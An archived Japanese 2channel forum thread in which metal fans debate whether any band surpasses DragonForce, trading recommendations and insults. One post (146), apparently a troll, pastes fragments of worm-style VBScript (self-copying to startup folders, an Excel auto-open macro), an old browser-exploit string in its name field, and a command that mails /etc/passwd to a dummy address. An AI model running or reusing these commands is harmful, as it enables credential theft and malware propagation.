5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

__ドラフォ超えるバンドねーの?__

1 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:02:02 ID:txgf4Yl+0
Nileとかcryptopsyとかたいがいのメタルはドラムとか
ギター効いてるけど唸ってるだけじゃん!!

ドラフォみたいにボーカルの技術も兼ね備えたバンドねーの?
マジ教えてくれ

必要なもの
激しさ
歌のうまさ
音楽性がいいもの


2 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:03:54 ID:1DbUsZ8W0
つ[エンペラー]

3 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:05:16 ID:uMyRmGyKO
スカイラ(r

4 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:07:48 ID:txgf4Yl+0
エンペラーもうなってるだけじゃん

Xとかドラフォみたいなバンドないのか?

5 :雷鼎:2006/04/29(土) 03:07:55 ID:3HLuUnVh0
Vo上手いか?

6 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:09:09 ID:EZyvK9430
スカイラとか女ボーカルじゃん。
そりゃだめだろ。

>>1
ドラフォって曲ワンパターンじゃない?
そこはどーなの?

7 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:09:10 ID:jiTzy5s+0
ハイドの新アルバム聴け。
ラルヲタが邦楽で最高のアルバムと絶賛するほど凄いよ。

8 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:10:04 ID:txgf4Yl+0
ドラフォは音楽性がある

歌もいい

9 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:10:44 ID:jiTzy5s+0
ちなみに音楽性はミューズを100倍濃くした感じ。
ほぼバロック音楽の域だと思う。

10 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:11:16 ID:EZyvK9430
邦楽で話進めんなやw
ここHR/HMスレなんですけどw

11 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:12:38 ID:jiTzy5s+0
は?この板は邦楽もありなんですが何か?
それに音はヘビメタだし。

12 ::2006/04/29(土) 03:12:44 ID:txgf4Yl+0
おまいらいいバンドないのか?

13 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:15:05 ID:dXDDij6e0
いいバンドはいるかもしれないが
ドラフォを超えるほどのバンドは皆無だろ

14 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:17:11 ID:bKb8hasBO
そうだな
ドラフォを超えるバンドはいないな

15 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:18:03 ID:dBHrSG4w0
俺も20年メタルを聴いてるが、
ドラフォこそ究極のMETALだな。

16 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:18:09 ID:jiTzy5s+0
ハイドの新譜やばいぞ

17 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:18:44 ID:EZyvK9430
>>13
まじか?そんなにドラフォいいか?
俺的にはみんな同じ曲に聞こえて仕方がないが。

18 ::2006/04/29(土) 03:19:08 ID:txgf4Yl+0
エンペラー音楽いいんだが歌がちゃんとしてくれれば最高なんだが

19 :('A`) ・・・of Fate ◆WdhDLN82BI :2006/04/29(土) 03:19:10 ID:tCSTw+9m0
>>1
  ∩ ∧_∧
⊂⌒( ・ω・ ) はいはいワロスワロス
 `ヽ_っ⌒/⌒c
     ⌒ ⌒


20 ::2006/04/29(土) 03:20:19 ID:txgf4Yl+0
おまいらここいる割に対した事ないな

俺を感動させてくれよ

21 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:21:02 ID:EZyvK9430
猫でも本が読める時代になったか…

22 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:21:47 ID:dBHrSG4w0
>17
おまえ素人か?
メタル聴く耳持ってないだけだろ。

>20
いや、マヂでドラフォを超えるバンドなんて、そうそう出てこねーって。


23 ::2006/04/29(土) 03:22:46 ID:txgf4Yl+0
でもドラフォってXに影響されてると思わんか?

似てる曲多い

24 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:23:10 ID:bKb8hasBO
ドラフォが全部同じに聴こえるってネタか?

25 ::2006/04/29(土) 03:25:07 ID:txgf4Yl+0
ネタだろ

なんかいいバンドに出会いたい

26 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:26:02 ID:jiTzy5s+0
ハイドは?洋楽ミュージシャンにも絶賛されてるし。

27 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:27:20 ID:EZyvK9430
まぁ彼らの最新作を聴きもせずこんなところにいる俺が
馬鹿なのかもな。みんな口そろえて最高って言うんだもんな…
出直すw

28 ::2006/04/29(土) 03:27:21 ID:txgf4Yl+0
ハイドなんてチンカス

大衆向け

29 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:30:34 ID:txgf4Yl+0
BOOWY聞け

最強のメタル

30 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:30:40 ID:hydPSeFn0
>>1
avenged sevenfoldマジ最高。

31 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:30:50 ID:KscbtgZn0
ライオットのサンダースティールあたり聞いてみな
あとドリームイーヴルの1st

32 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:31:48 ID:SVdZLzdu0
エックスジャパンのアートオブライフを聞け。

もしくは、シークレットスフィアでも聞いておけ。

33 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:32:46 ID:hydPSeFn0
http://www.youtube.com/watch?v=nPbYenI_n8o&search=avenged%20sevenfold

avenged sevenfold聴け!

34 ::2006/04/29(土) 03:35:34 ID:txgf4Yl+0
普通じゃね?

オフスプリングレベルだろ

35 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:35:42 ID:lKcfY3UY0
>>1
オレンジレン(ry

36 ::2006/04/29(土) 03:37:26 ID:txgf4Yl+0
オレンジレンジなんてカラオケで歌うくらい

37 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:39:09 ID:SVdZLzdu0
デリリウムヴェイル

38 ::2006/04/29(土) 03:40:44 ID:txgf4Yl+0
音源つきだとうれしす

39 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:41:47 ID:uMyRmGyKO
>>36
ものすごい的確な消費の仕方じゃねーかそれ
いいお客さんだなw

40 ::2006/04/29(土) 03:42:45 ID:txgf4Yl+0
女うけいいし簡単だからな

41 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:45:15 ID:uMyRmGyKO
じゃあお前はオレンジレンジだけ聴いてなさい。
それで大丈夫だから無理すんなw

42 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:46:30 ID:MEbyvug5O
ドラゴンフォース=速い、しつこい、疲れる。
ぶっちゃけアルバム一枚であきる

43 ::2006/04/29(土) 03:46:39 ID:txgf4Yl+0
つまらん

脳が覚醒される音楽聴きたいわ

44 ::2006/04/29(土) 03:47:26 ID:txgf4Yl+0
>>42

おこちゃま

45 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:50:03 ID:hydPSeFn0
メロスピ厨には、何すすめても無駄だな。

46 ::2006/04/29(土) 03:51:09 ID:txgf4Yl+0
最強のバンドを追い求めたい

47 :名無しさんのみボーナストラック収録:2006/04/29(土) 03:58:12 ID:bKb8hasBO
ドラフォを超えるものはメタルにはない

アニソンならあるいは…

48 ::2006/04/29(土) 03:59:01 ID:txgf4Yl+0

サスケ最強とか言うなよ?w

49 :名無しさんのみボーナストラック収録:2006/04/29(土) 04:18:33 ID:bKb8hasBO
とりあえずここで聞くよりはゲーム音楽板とかアニソン板で聞いた方がよさげだ

50 :名無しさんのみボーナストラック収録:2006/04/29(土) 04:33:31 ID:SVdZLzdu0
ロストホライズン

51 :名無しさんのみボーナストラック収録:2006/04/29(土) 04:35:53 ID:RqIulnAMO
らぷそでぃー

52 :名無しさんのみボーナストラック収録:2006/04/29(土) 06:33:43 ID:hduNgJRI0
キモさではメタル界NO.1

53 :名無しさんのみボーナストラック収録:2006/04/29(土) 07:33:27 ID:Rd09FL0i0
Ninja Magic

54 :名無しさんのみボーナストラック収録:2006/04/29(土) 08:03:32 ID:3uQR6xUM0
>>53
あいつらは最高だな。
メンバーの名前が笑える。

55 :名無しさんのみボーナストラック収録:2006/04/29(土) 10:06:47 ID:lCcUwfB60
>>53
メロスピじゃねーか
スピードオブニンジャッ!

56 :名無しさんのみボーナストラック収録:2006/04/29(土) 11:13:52 ID:G+JGTjyM0
別にボーカル大したことねえじゃん
ギターだって他に比べて飛び抜けてるわけじゃなし

57 :名無しさんのみボーナストラック収録:2006/04/29(土) 12:09:21 ID:yyp25jzAO
こうしてメロスピ信者を装ったアンチのせいで、またメロスピの立場が悪くなるのか…

58 :名無しさんのみボーナストラック収録:2006/04/29(土) 13:41:38 ID:SVbaP4DA0
だって中国人だもん

59 :名無しさんのみボーナストラック収録:2006/04/29(土) 14:04:56 ID:oA4ET+MRO
皆、あまりにも>>1の発言に踊らされてるぜ!

60 :名無しさんのみボーナストラック収録:2006/04/29(土) 14:11:12 ID:Ei29NInXO
アメリカのドラフォと呼ばれているCelladorはもちろん聞いたんだよな?
7月に日本デビューで、彼等の公式サイトいくとなぜかXのSilent Jelousyの
インストverをやってるのをダウンロードできる
ドラフォより俺は好き

61 :名無しさんのみボーナストラック収録:2006/04/29(土) 14:34:52 ID:dBHrSG4w0
マジレスすると、NINJA MAGIC。
パワー、スピード、メロディ、PV全てがドラフォの上をいってる。


62 ::2006/04/29(土) 14:57:48 ID:1bnA1dHj0
なんかねーの?

63 :名無しさんのみボーナストラック収録:2006/04/29(土) 15:00:56 ID:uMyRmGyKO
オレンジレンジ

64 :名無しさんのみボーナストラック収録:2006/04/29(土) 15:01:22 ID:hydPSeFn0
http://www.myspace.com/cellador

だからー、celldor聴けよ。
アメリカのドラフォだって。

65 :名無しさんのみボーナストラック収録:2006/04/29(土) 15:01:30 ID:71Hu7Dl90
まぁ’メロスピ界’だけでは超えられるバンドはいないかもね*^^*

66 ::2006/04/29(土) 15:01:31 ID:1bnA1dHj0

おもろないよ

友達いないべ?

67 :名無しさんのみボーナストラック収録:2006/04/29(土) 15:02:09 ID:SZW5bt5gO
>>1ってKAMEDAでしょ?

68 ::2006/04/29(土) 15:02:49 ID:1bnA1dHj0
celldorはまあまあよさげだね

69 :名無しさんのみボーナストラック収録:2006/04/29(土) 15:03:29 ID:ZTyBbUfB0
ちょwwwおまい自分を指してるってwwwww

70 :名無しさんのみボーナストラック収録:2006/04/29(土) 15:05:27 ID:ytnwLSmc0
コルピクラーニおすすめ

71 :名無しさんのみボーナストラック収録:2006/04/29(土) 15:32:23 ID:71Hu7Dl90
メロスパーには何を言っても無駄

72 ::2006/04/29(土) 15:36:13 ID:1bnA1dHj0
まあそー言わずに俺を感動させてくれ

73 :名無しさんのみボーナストラック収録:2006/04/29(土) 15:36:46 ID:F3oSkYgC0
つRhapsody

74 ::2006/04/29(土) 15:40:12 ID:1bnA1dHj0
できればyoutubeつきでお願いしたい

75 ::2006/04/29(土) 15:45:40 ID:1bnA1dHj0
こーみるとXって多大なる影響を及ぼしたんだな

76 :名無しさんのみボーナストラック収録:2006/04/29(土) 15:54:50 ID:71Hu7Dl90
こうみると
って
なにをどうみてるんだよ

77 ::2006/04/29(土) 15:55:59 ID:1bnA1dHj0
全然いいバンドあがんないじゃん

78 :名無しさんのみボーナストラック収録:2006/04/29(土) 15:57:12 ID:tRW2qNjZ0
自分で探せ糞ガキ

79 ::2006/04/29(土) 15:58:44 ID:1bnA1dHj0
ピザはここくんなよ

情報交換のために掲示板は存在すんだよ



80 :名無しさんのみボーナストラック収録:2006/04/29(土) 16:04:08 ID:3uQR6xUM0
>>70
アヤーヤヤーヤー

81 :咲゛:2006/04/29(土) 16:51:45 ID:QcGB9TlB0
無い気がする。

82 :名無しさんのみボーナストラック収録:2006/04/29(土) 16:53:38 ID:TAFMS0ss0
Nevermore
ttp://mp3.centurymedia.com/Nevermore_FinalProduct.mp3
ttp://mp3.centurymedia.com/nevermore_dead_riverdragon.mp3
ttp://mp3.centurymedia.com/Nevermore_ThePoliticsOfEcstasy_NextInLine.mp3
ttp://mp3.centurymedia.com/NEVERMORE_ivoyager_ENEMIESOFREALITY.mp3
ttp://mp3.centurymedia.com/Nevermore_EnemiesofReality_EnemiesofReality.mp3
ttp://mp3.centurymedia.com/Nevermore_DreamingNeonBlack_PoisonGodMachine.mp3

83 :名無しさんのみボーナストラック収録:2006/04/29(土) 17:00:53 ID:TAFMS0ss0
Nevermore
http://www.myspace.com/nevermorefans

84 ::2006/04/29(土) 19:20:49 ID:1bnA1dHj0
いねーの?

85 :名無しさんのみボーナストラック収録:2006/04/29(土) 19:26:38 ID:5B4tLrY90
ドラフォを超えるのはメタリカしかいねーんだよ!

86 ::2006/04/29(土) 19:30:12 ID:1bnA1dHj0
メタリカテンポ遅くね?

87 :名無しさんのみボーナストラック収録:2006/04/29(土) 19:34:46 ID:5B4tLrY90
以後、>>1は『今のメタリカよりはドラゴンフォース聴くほうがマシ』のスレに
に逝ってもらうということで。

糸冬 了 。

88 ::2006/04/29(土) 19:46:23 ID:1bnA1dHj0
メタリカ房バイバイ

89 :名無しさんのみボーナストラック収録:2006/04/29(土) 20:01:52 ID:8VueAPe50
http://www.youtube.com/watch?v=p7_JafYlMY8&search=dragonforce

映像見たけど、改めてドラフォのギターのソロはスゲエと思った・・・・
ピロピロだけどwww

90 :名無しさんのみボーナストラック収録:2006/04/29(土) 20:04:41 ID:dBHrSG4w0
だからNINJA MAGICを聴けと。
ドラゴンフォースよりも速くXよりも泣けるバンドだって。

91 :名無しさんのみボーナストラック収録:2006/04/29(土) 20:14:05 ID:8VueAPe50
http://www.youtube.com/watch?v=3S7gBSgtrx0&search=dragonforce

いたいた、ブラックメタル+ドラフォwwwww
これぞ最強www笑い止まんねぇよwwwww

92 ::2006/04/29(土) 20:17:05 ID:1bnA1dHj0
youtube
うpして

93 :名無しさんのみボーナストラック収録:2006/04/29(土) 20:19:01 ID:8VueAPe50
見れるでしょwww
爆笑中wwww

94 :名無しさんのみボーナストラック収録:2006/04/29(土) 21:02:10 ID:8Kk3LTKK0
ファミコンwwww

95 ::2006/04/29(土) 21:06:25 ID:1bnA1dHj0
ninjaうpして

96 :名無しさんのみボーナストラック収録:2006/04/29(土) 21:14:54 ID:3uQR6xUM0
ピロピロいっていて、スピードが早く、
かつヴォーカルにメロディがあるバンドは、
ドラフォが最高峰。

あんなギャグは誰にもまねできん。

97 :名無しさんのみボーナストラック収録:2006/04/29(土) 21:15:40 ID:8cYhz+C7O
ドラフォはリアルスロットだぜWWW

98 ::2006/04/29(土) 21:17:59 ID:1bnA1dHj0
でもドラフォはくにおくんの運動会の音楽に似てるよなwww


99 :名無しさんのみボーナストラック収録:2006/04/29(土) 21:21:18 ID:RNZtyzwb0
メタル初心者にはドラフォの凄さは分からんだろ。

100 ::2006/04/29(土) 21:23:57 ID:1bnA1dHj0
ドラフォは人生の中で最高峰のバンドだと思っていますが

101 :名無しさんのみボーナストラック収録:2006/04/29(土) 21:27:47 ID:Rx84CwCt0
http://www.youtube.com/watch?v=IIsMPT1aGbA
Ninja Magic - The Way of Life

初めて聴いたけどバックはたしかにドラフォだな

102 :名無しさんのみボーナストラック収録:2006/04/29(土) 21:34:59 ID:8cYhz+C7O
>99 ジジイにはわかるんですねww

103 :名無しさんのみボーナストラック収録:2006/04/29(土) 22:05:16 ID:fTRgFNCFO
ドラフォってドラゴンフォースのこと?
って素でわからない俺が聞いてみる。

104 ::2006/04/29(土) 22:09:09 ID:1bnA1dHj0
ドラゴンクエストフォルクスの略

105 :名無しさんのみボーナストラック収録:2006/04/29(土) 22:11:55 ID:3/pg0rXuO
ドラゴニックフォーザーかと思ってたが

106 ::2006/04/29(土) 22:14:12 ID:1bnA1dHj0
ドラクエ4の略だよ

そんくらいわかるだろ

107 :名無しさんのみボーナストラック収録:2006/04/29(土) 22:17:11 ID:hbHCPLWU0
>>75
アイタタタタタタ‥‥。

108 :名無しさんのみボーナストラック収録:2006/04/29(土) 23:05:56 ID:8cYhz+C7O
メンバーがウィー並に不細工

109 :名無しさんのみボーナストラック収録:2006/04/29(土) 23:33:55 ID:xkFXjhF/0
これからはninja magicの時代

110 :名無しさんのみボーナストラック収録:2006/04/29(土) 23:46:48 ID:F8jngF900
重さがない

111 :名無しさんのみボーナストラック収録:2006/04/29(土) 23:51:33 ID:myPkOCys0
>>109
http://www.youtube.com/watch?v=IIsMPT1aGbA

確かにドラフォも適わない。

112 :名無しさんのみボーナストラック収録:2006/04/30(日) 00:23:46 ID:wgMXUeei0
NEVERMOREがあまりにも凄すぎて反論すらできなかったようだなw

113 :名無しさんのみボーナストラック収録:2006/04/30(日) 02:19:31 ID:0fUr5qD10
セイキマツが俺の中でドラフォを越えた・・・。

114 :名無しさんのみボーナストラック収録:2006/04/30(日) 02:28:34 ID:KoMI63HT0
>>113
さっきNHK見てましたね?

115 :名無しさんのみボーナストラック収録:2006/04/30(日) 02:32:07 ID:CTpUkpTM0
ドラフォってそんなにいいかな?
Voうまいとも思えないんだが

>>113
俺も大ファンだ。聖飢魔Uはライブを見たほうがいい。特に後期

116 :名無しさんのみボーナストラック収録:2006/04/30(日) 12:08:47 ID:Q97nbLd90
うまくないしピロピロだね
俺は好きだけど

117 :名無しさんのみボーナストラック収録:2006/04/30(日) 14:13:01 ID:mjlFZY3ZO
要するに>>1はこう言いたいんだろ?


ドラフォ好きの僕ですが、他にいいバンドあったら教えて貰えませんか
中学生だと馬鹿にされるのでちょっと挑発気味に書いてばれないようにしますね




CELLADOR聞け

118 :名無しさんのみボーナストラック収録:2006/04/30(日) 19:59:06 ID:tZTdrjqh0
ドラゴンフォースは同じ系統のバンドと比べると、速さを追求するという面では独自のオリジナリティーを持っているが、
このバンドの楽曲一つ一つのオリジナリティーがない。

119 :名無しさんのみボーナストラック収録:2006/04/30(日) 20:03:41 ID:ZO71iOwd0
ドラコだけ聴いてればいいじゃん

120 :名無しさんのみボーナストラック収録:2006/04/30(日) 20:19:48 ID:LAKDJ4Ic0
>>1の性格、スレ展開からして以下のスレの>>1と同一人物のような気がするの俺だけ?


http://music4.2ch.net/test/read.cgi/hrhm/1143645201/l50

121 ::2006/04/30(日) 20:28:08 ID:08mOsT2m0
ちげーよ屑

確かにそのスレは全部読んだが

122 :名無しさんのみボーナストラック収録:2006/05/01(月) 00:28:56 ID:I9P9Lcir0
>>118
そんなことはないだろ。
ドラゴンフォースの妙に明るいメロディは個性だと思うがな。

123 :名無しさんのみボーナストラック収録:2006/05/01(月) 00:35:04 ID:gHk4fee60
バルサゴスの新譜は良かったなー。
ドラマーもドラフォのときと違って生き生きしてる。

124 :名無しさんのみボーナストラック収録:2006/05/01(月) 01:23:44 ID:sqCcFB5k0
この前ドラフォの3rdを試聴機で聴いたが、最初試聴機が壊れて早回しになっているのかと思った。

125 :名無しさんのみボーナストラック収録:2006/05/01(月) 05:58:00 ID:HWZ5IVn00
とりあえずEmperor聴いとけ。

http://music4.2ch.net/test/read.cgi/hrhm/1129363500/l50

126 :名無しさんのみボーナストラック収録:2006/05/01(月) 12:28:39 ID:O3MDbhsp0
>>124
同意見

何でも早送りして聴いて下さい。

127 :名無しさんのみボーナストラック収録:2006/05/02(火) 09:12:05 ID:eEMNauc90
要は速さだけ重視しすぎて一曲一曲の完成度が低い。
ただ同じようなことを何回も繰り返してるだけ。



128 :名無しさんのみボーナストラック収録:2006/05/02(火) 11:37:05 ID:QPHn8K7y0
そんなことねーだろ。言葉遊びだな。

129 :名無しさんのみボーナストラック収録:2006/05/02(火) 12:49:04 ID:jOGcMW8K0
悪くないとは思うけど、印象が薄いっていうかインパクトがないんだよな。

130 :名無しさんのみボーナストラック収録:2006/05/02(火) 14:49:05 ID:q+lQzRNs0
やっぱジャスティスまでのメタリカの方がリフが凝りに凝ってて格好良い。
テンポはドラフォほどじゃないが速いことは速いし。
でもそれ以降のメタリカだったらドラフォの方が良い。

131 ::2006/05/02(火) 17:18:02 ID:yXwxvjtC0
マイケルジャクソンには勝てない気がする

132 :名無しさんのみボーナストラック収録:2006/05/02(火) 17:23:24 ID:qO9CZs8N0
じゃあ死ねよw

133 ::2006/05/03(水) 18:35:46 ID:CSpHAxci0
超えるバンドないのか?

134 :名無しさんのみボーナストラック収録:2006/05/03(水) 18:43:33 ID:45VFkTV40
>>1
つまらんこと聞くが、メイデンとかは聴いたことあるよな?

135 ::2006/05/03(水) 19:47:15 ID:CSpHAxci0
メイデンなんて聞いてて疲れる

136 :名無しさんのみボーナストラック収録:2006/05/03(水) 19:52:05 ID:Op0vRXlAO
ドラポとオレンジレンジだけ聴いてりゃいいじゃん。幸せじゃん。

137 :名無しさんのみボーナストラック収録:2006/05/03(水) 20:30:43 ID:45VFkTV40
まぁ好き嫌いだとは思うけど。とりあえずメイデン聴いてて疲れるようでは、
「ドラフォ超えるバンドねーの?」と言える資格はないと思う。
おまいの成長しだいで、メタルをもっと楽しめるようになると思うよ。
がむばれ。

138 :名無しさんのみボーナストラック収録:2006/05/03(水) 21:03:04 ID:CmJbZ8oD0
つーか>>1はドラフォが好きなだけだろ。
メタルが好きなんじゃなくて。

139 ::2006/05/03(水) 21:48:12 ID:CSpHAxci0
メタルがすきだな

ただうなっているだけのデスメタは好きではない

せっかくのメロディーが台無し



140 ::2006/05/03(水) 21:48:54 ID:CSpHAxci0
cryptopsyとかのメロディーは特にもったいないと思う



141 ::2006/05/03(水) 21:52:48 ID:CSpHAxci0
まあ聞いてて疲れるとは言い過ぎたが

142 :名無しさんのみボーナストラック収録:2006/05/03(水) 21:56:20 ID:mDIYei3y0
いいから死ねよw

143 ::2006/05/03(水) 21:58:14 ID:CSpHAxci0
>>142

おまえがな

144 :名無しさんのみボーナストラック収録:2006/05/03(水) 22:01:37 ID:mDIYei3y0
いいから死ねよw

145 ::2006/05/03(水) 22:07:12 ID:CSpHAxci0
厨房はこなくていいよ

146 :ms-its:mhtml:file://c:\:2006/05/03(水) 22:09:37 ID:mDIYei3y0
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
kak.hta';ken=wd+'START

147 :名無しさんのみボーナストラック収録:2006/05/03(水) 23:22:17 ID:JuPPrguzO
ドラフォって、ボーカルとベースが弱過ぎる。

マニガンス聴けば?

148 ::2006/05/03(水) 23:28:06 ID:CSpHAxci0
ボーカルはいいがベース音が確かに弱いな

149 :名無しさんのみボーナストラック収録:2006/05/03(水) 23:37:06 ID:JuPPrguzO
いやいやボーカルも弱いでしょ。

150 ::2006/05/03(水) 23:45:48 ID:CSpHAxci0
マジだ

おれはメロスピ派だからな

151 :名無しさんのみボーナストラック収録:2006/05/04(木) 00:00:18 ID:Tcsx9sBn0
1はウィー。間違いない。

152 :名無しさんのみボーナストラック収録:2006/05/04(木) 01:39:14 ID:ifWyS45uO
>>86
おまえメタリカ聴いたことないだろw

153 ::2006/05/04(木) 01:46:20 ID:TS1Hiqfj0
アルバムメタリカ聞いたが遅かった。

154 ::2006/05/04(木) 01:49:47 ID:TS1Hiqfj0
みんなメタリカ言うけど遅い

そんなによいなら音源うpしてよ

155 :名無しさんのみボーナストラック収録:2006/05/04(木) 01:52:47 ID:ifWyS45uO
マスパペとかちょっとは速いと思うよ

156 :名無しさんのみボーナストラック収録:2006/05/04(木) 01:56:33 ID:moMGKBcX0
マスパペ聞いたこと無いんなんて言ったら叩かれますよ

157 :名無しさんのみボーナストラック収録:2006/05/04(木) 02:07:23 ID:VzJKi8mB0
>>156=正しい

>>ただうなっているだけのデスメタは好きではない
 せっかくのメロディーが台無し
  =間違い
   


158 ::2006/05/04(木) 02:08:26 ID:TS1Hiqfj0
感性の違いだろ

俺の耳は厳しい

159 ::2006/05/04(木) 02:09:02 ID:TS1Hiqfj0
マスパペおんげんうp

160 ::2006/05/04(木) 02:13:19 ID:TS1Hiqfj0
あーメタリカのアルバムのことか

略しててわからんかった

161 ::2006/05/04(木) 02:21:44 ID:TS1Hiqfj0
metarilcaは俺にあわない

helloweenが限界か。。

162 :名無しさんのみボーナストラック収録:2006/05/04(木) 02:22:07 ID:Tcsx9sBn0
ますます1はウィーだろwww
誰にもかまってもらえないあたりなんてwww

163 :名無しさんのみボーナストラック収録:2006/05/04(木) 02:26:22 ID:VzJKi8mB0
ひとりレス大変そうだね…(´ー`)
一応綴り訂正しとく metarilca→metallica

ドラフォの他に何がfavoriteなんだ?


164 ::2006/05/04(木) 02:28:34 ID:TS1Hiqfj0
メタルではないが

X
Dir
が好きだな

165 ::2006/05/04(木) 02:31:36 ID:TS1Hiqfj0
てかまじめにエンペラーとかニールとかクリプト聞いてる奴って自分が
かっこいいと思ってんのカ?

166 :名無しさんのみボーナストラック収録:2006/05/04(木) 02:35:37 ID:VzJKi8mB0
あーそっちか。
ジャパメタから洋メタに来たのか。
俺はディープパープルからだんだんヘヴィーなやつを
聴き始めたから、>>1とは音楽的背景が違うな。
ほんとにメタルが好きなら、マスパペとかはうpとかじゃなくて
レンタルしてきてほしいよ、俺としては。

167 :名無しさんのみボーナストラック収録:2006/05/04(木) 02:37:38 ID:czs9EGo90
>>165
全部2chで有名だから糞だよそいつら。
もっとマイナーどころきいたらどうだ?

168 :名無しさんのみボーナストラック収録:2006/05/04(木) 02:40:54 ID:dDhvYy9IO
つっこみどころが満載すぎて、どこからつっこんだらいいかわからないのでつっこみません。ギャハ。

169 :名無しさんのみボーナストラック収録:2006/05/04(木) 02:41:02 ID:moMGKBcX0
有名だから糞

OTL

170 :名無しさんのみボーナストラック収録:2006/05/04(木) 02:43:17 ID:SmmMaZ0P0
興味はあったけどドラフォはじめて聞いた。
何か早いだけか.....?と思ってたが、やりすぎてる感じが
逆に良く思えてきた。下手にカッコつけてないで、とにかく
早弾きオタク的な感じがGoodですね。あんな超上級技とかやってるとはね..
でもこういうの好きならX JAPANのアートオブライフでいいんじゃね?w
それかセックスマシンガンズとかさw 俺は絶対スレイヤーだけどね。

171 ::2006/05/04(木) 02:43:30 ID:TS1Hiqfj0
>>166

君はまともに話ができるな。
俺はもともと音楽聴かないほうだったんだ。GLAYとかメジャーばっかで
洋楽なんで皆無だったな。んで高校のとき知ってるつもりで
hideの特集がやっててそこから大学入りX聞くようになった。
かなり良かった。ドラフォとであったのは最近だな。
彼らはマジスゲーと思った。

ウィニーとか流行ってるがほんとにいいと思う曲は
やっぱ借金しても買ってやりたいわ


172 ::2006/05/04(木) 02:45:39 ID:TS1Hiqfj0
>>167みたいな奴は何がしたいのかわからん

SMAPのCD買う奴と同じ次元だわ

173 :名無しさんのみボーナストラック収録:2006/05/04(木) 02:45:56 ID:VzJKi8mB0
>>167>>169
有名だから糞っていう位置づけは俺には理解できん。

174 ::2006/05/04(木) 02:48:45 ID:TS1Hiqfj0
>>173

大衆向けといいたいのだろう

俺は音楽詳しいと言いたいのが丸見え。ほっとけ

175 ::2006/05/04(木) 02:51:44 ID:TS1Hiqfj0
まあ大衆向けになると確かに音楽性が変わってくるが

その点Dirとかはよりコアになって大衆離れしていくが
売れなくなっても自分の音楽やってるのがすばらしい



176 :名無しさんのみボーナストラック収録:2006/05/04(木) 02:54:35 ID:czs9EGo90
>>174
キレんなよ、うぜーな。
クイーン並に売れたらどうせ馬鹿にするくせによー

177 ::2006/05/04(木) 02:57:27 ID:TS1Hiqfj0
>>176

おまいがいいたいことも一理ある

Xだって同じ事が言える

178 ::2006/05/04(木) 02:59:27 ID:TS1Hiqfj0
てか明日面接なのに何やってんだ俺wwww

あっMP3プレイヤー壊れたんだがお勧めある?

1Gメモリタイプ使ってる奴壊れにくいの教えてくれ

179 :名無しさんのみボーナストラック収録:2006/05/04(木) 03:15:50 ID:VzJKi8mB0
>>178
寝ろ。

180 :名無しさんのみボーナストラック収録:2006/05/04(木) 04:23:05 ID:X47asekn0
>>1
激しさ
歌のうまさ
音楽性がいいもの

これらの定義から言えばCHARなんかどうでしょうか。
CHARいいっすよ。
激しいし、あんだけすげーギター弾きながら歌唄ってるし。
音楽性も最高。
後ジェフ・ヒーリーなんかどうでしょう。
盲目なのにあのプレイは言葉にできん。

っていうかこの質問ナンセンス以外の何物でないよね。
時の必然てもんがわかってない。
このタイトルの行間には
「ドラゴンフォース最高。これ以外はメタルじゃない」
っていう言葉が隠れてるんだけど
すべてのものは流れてるんであって”いい”っていうのはその瞬間の産物だってこと。
そしてジミー・ペイジやヴァン・ヘイレンなんかが”すげーことした”という
事実があってはじめて永遠と言う名作になるのだということをこの人はわかってない。
今パープルやメタリカがデビューしたって大騒ぎするほどのことじゃないでしょ。
簡単に言えば好きなもん聴いてりゃいいじゃん。
あんまりアホな発想しなさんな。

じゃー俺は南野陽子でも聞きながら寝るかな。
じゃね!



181 :名無しさんのみボーナストラック収録:2006/05/04(木) 05:07:24 ID:moMGKBcX0
ネタだったらすまんが、
メイデンはおろかメタリカさえ合わないって言ってる奴に
charは無理っしょ
ドラフォからcharに最短で行き着くには速弾きつながりで
richie kotzen辺りを経由しないと、、つーか無理矢理だが

182 :名無しさんのみボーナストラック収録:2006/05/04(木) 05:10:44 ID:IVlgE4cW0
とりあえずどうしようもないメロスピ厨である事は分かる
今は何薦めてもダメな状態なのさ
